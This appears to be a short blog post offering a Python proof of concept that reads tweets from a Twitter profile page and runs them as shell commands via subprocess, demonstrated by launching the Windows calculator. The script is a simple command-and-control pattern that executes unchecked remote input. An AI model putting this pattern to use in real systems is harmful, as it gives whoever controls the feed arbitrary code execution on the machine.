Twitter Whisperer

whisperer

 

A couple of days ago I read this post on how hackers abused Twitter as C&C. It got me wondering on the possibility of controlling your computer via Twitter.

And the answer is: Yes!, you can control your computer via Twitter, without even using its API.

So imagine you don’t have access to SSH, you can send commands to your computer by just tweeting out whatever you want it to do… I know… there are so many security implications involved here. But yes, the possibilities are endless. The are a couple of caveats, the first one is that the computer that you would be controlling remotely would need to have Python installed, and the second one is that it would need to have a task scheduled to run the script,  and so if you setup a time-lapse of 1 minute between runs, that would be the time-lag that you would need to consider if you want to send a command like the Panic-Button to unmount TrueCrypt drives and shut the computer off.

As a very simple POC, I will pop up the Calculator in Windows.

This is the code for Twitter Whisperer, which can be found here:

from bs4 import BeautifulSoup as soupy
import urllib.request
import re
import subprocess

html = urllib.request.urlopen("https://twitter.com/<your account here>").read()
soup = soupy(html, "lxml")

x = soup.find("meta", {"name": "description"})['content']
command = re.findall('"([^"]*)"', x)

subprocess.call(command[0])


Login to your Twitter account and simply tweet: Calc.exe

tweet

Run the script, and watch the calculator pop-up:

calc

 

I know, it’s just too simple!

Advertisements

One thought on “Twitter Whisperer

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s